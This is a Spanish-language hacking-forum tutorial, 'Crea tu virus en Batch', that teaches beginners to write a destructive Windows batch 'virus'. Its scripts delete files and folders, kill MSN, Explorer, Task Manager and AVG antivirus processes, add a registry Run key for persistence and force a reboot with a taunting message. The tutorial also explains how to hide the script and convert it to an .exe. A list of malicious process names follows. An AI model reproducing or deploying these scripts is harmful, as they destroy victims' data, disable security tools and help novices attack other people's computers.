Crea tu virus en Batch.

Hola, bueno un pequeño manual para la gente que le gusta el Batch o lo quiere aprender.

En este manual vamos a crear un "virus".

Bueno lo que vamos a necesitar es un Block de Notas (El de Windows)

Buena imaginación, y pues paciencia

Ok. Vamos a comenzar. Abrimos el Block de Notas.

Antes debemos saber que es batch y unos comandos básicos.

¿QUE ES BATCH?

Como sé que no lo van a leer les explico un poco acá.

Un archivo batch es un archivo de procesamiento por lotes: se trata de archivos de texto sin
formato, guardados con la extensión *.bat que contienen un conjunto de comandos DOS.
Cuando se ejecuta este archivo bat, los comandos contenidos son ejecutados en grupo, de
forma secuencial, permitiendo automatizar diversas tareas. Los comandos son así como los del
MS-Dos.

Bueno ahora unos comandos básicos.

Del = Borrar archivos. Ejemplo: del c:/direccion/archivo.exe lo borrara.

Rd = Borrar directorio de raíz. Ejemplo: c:/directorio borrara ese dir.
Start = Comenzara "algo". Ejemplo: start www.pagina.com; start c:/programa/ini.exe
Pause = Pausa
Exit = Salir
Taskkill = Mata proceso. Ejemplo: taskkill /f (fuerza bruta) /im nod32.exe
o taskkill /f proceso.exe, es lo mismo tskill
set /p x= Son set para hacer preguntas/variables/etc ejemplo: set /p pre= ¿Estas bien?
if %pre%== = (lleva 2 ==) Para contestar el set /p x=. Ejemplo: set /p pre= ¿Estas bien? y
abajo
if %pre%== si goto si
if %pre%== no goto no
Goto = Etiquetas. Ejemplo: si y abajo desarrollamos el goto si: no desarrollamos el goto no.
Bucle = Es un simple "cajón" que repite una acción. Ejemplo:
: no
start www.google.com.ar
goto no
Así sería un bucle
>><< = Son re direccionamientos. Ejemplo: start x.exe >> ftp.txt algo así
Cls = Limpiara la pantalla. Ejemplo: tenemos todo escrito. Ponemos pause (Para que el user
lea lo que dice y luego cls así toca una tecla y quedara todo en blanco)
Format unidad: = Formatea la unidad. Ejemplo: format c:
Msg* = Da un mensaje con un cartelito de Windows. Ejemplo: msg* chau xD
Echo = Da un mensaje dentro de la consola. Ejemplo echo xDDD
Date = Día/Mes/Año. Ejemplo: date x/x/x
Time= Hora. Ejemplo: time x:x
Bueno estos son los básicos.
Ahora empezamos.

En el Block de notas (Que abrimos arriba)

Vamos a pensar cómo va a ser nuestro

Queras que el virus borre data, cierre MSN, borre una carpeta, desaparezca el explore y que la
reinicie dando un mensaje. Y esto que se añada a un registro

Para empezar en el "virus" lo que haremos es empezar acción por acción.

Para empezar haremos que borre la "data" (Información)

Nuestro "virus" será en forma oculta y en .exe (Luego les digo como)

Ahora, no pondremos echo pero si msg*. Echo no pondremos porque estará en forma oculta y
no leerlo

Bueno entonces empezando.

Haremos que borre unas cuantas cosas

Crearemos una etiqueta para no perdernos. (Goto)

: borrar
del c:/Windows/archivos.exe (Tu lo cambias)
del c:/carpeta/file.exe
msg* Escúchame
msg* Se te esta llendo todo al tacho
msg* Lo siento xD
goto cerrar (me lleva al goto cerrar)

y así hasta que borremos la información de red añadiremos unos mensajes.

Entonces ahí tenemos que borre y mande unos mensajes

ahora vamos por que cierre el MSN.

: cerrar
taskkill /f msnmsgr.exe -> proceso del MSN.
Goto carpeta del

ahora vamos por el goto que borrara carpeta que será carpeta del (Debemos poner goto
carpeta del aunque no es necesario. mirar arriba)

: carpeta del
rd c:/carpeta
rd c:/archivos
goto killexp

Ahora es el momento de matar proceso del explore. Goto killexp

: killexp
taskkill /f /im explorer.exe
si quieres matar otro solo remplaza el "explorer.exe"
goto shutdown

Momento de reiniciar. Goto shutdown

: shutdown
SHUTDOWN -R -F -T 30 -C "Amigo, estas perdido." lo que está en " " es el comentario que
dará.
Goto borrar

Como verán no es necesario poner goto x así que no lo pondremos. Tampoco es necesario
separarlo por goto

Entonces nos queda así

del c:/Windows/archivos.exe
del c:/carpeta/file.exe
msg* Escuchame
msg* Se te esta llendo todo al tacho
msg* Lo siento xD
taskkill /f msnmsgr.exe
rd c:/carpeta
rd c:/archivos
taskkill /f /im explorer.exe
SHUTDOWN -R -F -T 30 -C "Amigo, estas perdido."

Claro ustedes le puede añadir más cosas

Nos falta 2 cosas muy importantes

el @echo off (Aun que será de forma oculta, pero pues lo pondremos)
y el nuevo registro así cada vez que se prenda pase yo recomiendo añadir un taskkill al
administrador de tares (taskmgr), así no cierra el batch.

Entonces así nos queda

@echo off
reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v skls /t reg_sz /d juego.bat /f
taskkill /f /im taskmgr.exe
del c:/windows/archivos.exe
taskkill /f /im taskmgr.exe
del c:/carpeta/file.exe
taskkill /f /im taskmgr.exe
msg* Escúchame
taskkill /f /im taskmgr.exe
msg* Se te esta llendo todo al tacho
taskkill /f /im taskmgr.exe
msg* Lo siento xD
taskkill /f /im taskmgr.exe
taskkill /f msnmsgr.exe.
taskkill /f /im taskmgr.exe
rd c:/carpeta
taskkill /f /im taskmgr.exe
rd c:/archivos
taskkill /f /im taskmgr.exe
taskkill /f /im explorer.exe
taskkill /f /im taskmgr.exe
SHUTDOWN -R -F -T 30 -C "Amigo, estas perdido."

<Por qué repito el mata administrador de tareas? Para que cuando lo quiera iniciar mientras
esta el virus corriendo no pueda

el reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v skls /t reg_sz /d juego.bat /f -> es

el que añadirá el registro

Ahora ya tenemos todo, lo guardamos como juego.exe

Bueno nos falta pasarlo a .exe y que se abra de forma oculta

Eso es fácil, gracias a Hendrix

Para eso nos descargamos esto --

>http://es.geocities.com/cusacoxa/Fast_Exe_Batch_Maker.zip

Y ya, ese mismo tiene la opción de ejecutarlo de forma oculta y ya nos queda. Ahora a jugar.
Es una lista de procesos malignos
absr.exe - Virus AUTOUPDER

aconti.exe - DIALER

adaware.exe - spyware RAPIDBLASTER

adobes.exe - Virus FLOOD.BA

adp.exe - spyware que Se instala con Net2Phone, Limewire, Cydoor, Grokster, KaZaa, etc

Advapi.exe - Virus NETDEVIL.12

backweb.exe - Backweb Adware, muestra publicidad

bargains.exe - spyware que se instala con Net2Phone y LimeWire.

bndt32.exe - virus LACON

boot.exe virus - ELEM

bpc.exe - spyware que se instalar con GROKSTER

brasil.exe - virus OPASERV.E

cekirge.scr - virus KERGEZ.A

cmd32.exe - virus P2P.TANKED

cme.exe - spyware parte de GATOR.

cmesys.exe - spyware parte de GATOR

cnbabe.exe - spyware

comcfg.exe - virus TOADCOM.A

command.exe - virus QQPASS.E

cpumgr.exe - virus PANDEM.B

ct_load.exe - virus OPASERV.E

ctbclick.exe - spyware

cuo.exe - virus BUGBEAR

ddhelp32.exe - virus BIONET.318

desire.exe - un dialer conecta con webs porno llamando a un 906

directx.exe - virus SDBOT.D, BLAXE o LOGPOLE

dlder.exe - Se instala con Bearshare, LimeWire, Grokster, Net2Phone, Kazaa

dlgli.exe - muestra publicidad

dllmem32.exe - virus KWBOT.E

dllreg.exe - virus NIBU, BAMBO o DUMARU

dssagent.exe - spyware

dw.exe - muestra publicidad

dxupdate.exe - virus MAFEG

enbiei.exe - virus BLASTER.F

expl32.exe - virus RATSOU, HACKTACK

explore.exe - virus GRAYBIRD.G, NETBUS o HAWAWI

fhfmm.exe - spyware

flydesk.exe - spyware

gain_trickler_exe - se instala con varios programas

gator.exe - se instala con varios programas

gmt.exe - se instala con varios programas

hbinst.exe

hcwprn.exe - spyware

helpctl.exe - virus GASLIDE

https.exe - virus MOEGA.D

hxdl.exe - spyware que se instala con ATTUNE, un complemento de muchos programas

hxiul.exe - spyware que se instala con ATTUNE, un complemento de muchos programas

icon.exe - virus RAPIDBLASTER

ide.exe - virus ASSASIN.F

iedll.exe - modifica opciones en el internet explorer

lexplore.exe - virus OBLIVION.B

iexplore32.exe - virus SPEX

iexplorer.exe - virus LORSIS o RAPIDBLASTER

internet.exe - virus MAGICCALL

ipmon.exe - virus RECERV

isass.exe - virus OPTIX PRO

kern32.exe - virus BADTRANS.A

kernel32.exe - virus BABYLONIA, KERNEL, KICKIN.A, TENDOOLF o HOOKER

kkcomp.exe - spyware
kvnab.exe - spyware

liqad.exe - spyware

liqui.exe - spyware

load32.exe - virus NIBU,BAMBO o DUMARU

isem.exe - spyware PURITYSCAN

lycos.exe - mas informacion

messenger.exe - virus KUTEX

mp3search.exe - spyware LOP.COM

mptask.exe - virus LALA, DOWNLOADER-BN.B o AOT

msbb.exe - spyware que se instala con varios programas, muestra publicidad

msblast.exe - uno de los mas famosos de los ultimos tiempos.

mscom32.exe - virus BESTY.H

msiexec16.exe - virus OPTIX PRO

mslaugh.exe - virus BLASTER.E

mslogon.exe - spyware;

msnet.exe - virus SDBOT o BOA

mstask32.exe - virus YAHA.P

mstray.exe - virus WUKILL.A

nabv32.exe - virus TITOG.C

netd32.exe - virus RANDEX.F o SDBOT.R

newsupd.exe - spyware

njgal.exe - virus KILO

npnsdad.exe - spyware

npnzdad.exe - spyware

nstask32.exe - virus RANDEX.E

onflow.exe

owmngr.exe - spyware que cambia la configuracion del internet explorer, muestra publicidad

rb32.exe - virus RAPIDBLASTER

rcsync.exe - muestra publicidad

realevent.exe - muestra publicidad

realsched.exe - se instala con realone player, ralentiza el sistema

real-tens.exe - spyware

regcmp32.exe - virus POLDO.B

registry.exe - virus DOWNLOADER.CILE

regloadr.exe - virus GAOBOT.AO

regscanr.exe - virus OPTIX LITE FIREWALL BYPASS

regsrv.exe - virus OPTIXPRO.11

run_cd.exe - virus GHOST.23

runapp32.exe - virus NEODURK

rundli32.exe - virus LADE

rundll16.exe - virus SDBOT.F

savenow.exe - virus SPREDA.B;

svchosl.exe - virus GAOBOT.P

svchosts.exe - virus SDBOT

svch0st.exe - virus GRAYBIRD

synchost.exe - virus RIP JAC

sysconf.exe - virus SDBOT

sysldr32.exe - virus GAOBOT

sysreg.exe - cambia la configuracion del internet explorer y muestra publicidad

system.exe - virus CHILI, NULLBOT, FULAMER.25, GATECRASH.A

systray32.exe - virus DABOOM

tasktray.exe - spyware

teekids.exe - virus BLASTER.C

ttps.exe - cambia la pagina de busqueda del internet explorer, muestra publicidad

virus_cleaner.exe - virus PANOL

wanobsi.exe - modifica la pagina de busqueda del internet explorer

win32_i.exe - spyware

win32API.exe - cambia la pagina de inicio del internet explorer

win32us.exe - se conecta con webs pornograficas

wincfg32.exe - virus SILVERFTP

wincomp.exe - TROYANO

windex.exe - virus GAOBOT.BM

windfind.exe - DIALER

windll.exe - virus TRYNOMA, STEALER

windll32.exe - virus MSNPWS, ASTEF, RESPAN

windows.exe - virus QQPASS.E, KAZMOR, BOBBINS ALADINZ.D

winhelp.exe - virus LOVGATE.G

winkrnl386.exe - virus ZEBROXY

winmgm32.exe - virus SOBIG, LALAC.C

wininit.exe - virus BYMER

winlogin.exe - virus RANDEX.E

winnet.exe - es uno de los peores spywares, se instala con imesh

winserv.exe - parte de intelligent explorer

winservices.exe - virus YAHA.K, YAHA.M

winservn.exe - spyware

winsys32.exe - virus CIGIVIP, RECKUS

winsystem.exe - virus WHITEBAIT

wintask.exe - virus HIPO, NAVIDAD, LEMIR.F

winupdate.exe - virus BMBOT, RADO

winz32.exe - virus KWBOT.Z, SDBOT.Q

wnad.exe - spyware que muestra publicidad

wupdated.exe - virus MOEGA

wupdt.exe - parte de intelligent explorer

xadbrk.exe - spyware

xupiterstartup.exe
Matar Un Proceso.

Yo uso taskkill /, no sé cómo es el otro me fije, pero lo deje ahí...

Podes saber los programas que están rondando con el administrador de tareas, usa nadamas
los que tengan el nombre de usuario, que son los programas que usas

el /im es el nombre del proceso le vas a decir que proceso quieres matar y

/f es para forzar, yo lo uso con mi batch de esta forma

Obviamente elegí los que quieras matar...

mi batch

@echo off

taskkill /im msnmsgr.exe /f

taskkill /im wmplayer.exe /f

taskkill /im idman.exe /f

taskkill /im avgamsrv.exe /f

taskkill /im avgamsvr.exe /f

taskkill /im msgdiscoveryx.exe /f

taskkill /im winword.exe /f

taskkill /im excel.exe

taskkill /im explorer.exe /f

cls

color 0a

echo ******************************************************************

echo.

echo !!! ja ja ja !!! ya te mate a todos!!! matth

echo.

echo *****************************************************************

pause> nul

Read more:
http://foro.elhacker.net/hacking_basico/matar_el_proceso_explorerexe_desde_un_bat-
t104020.0.html#ixzz0xSmoQRg2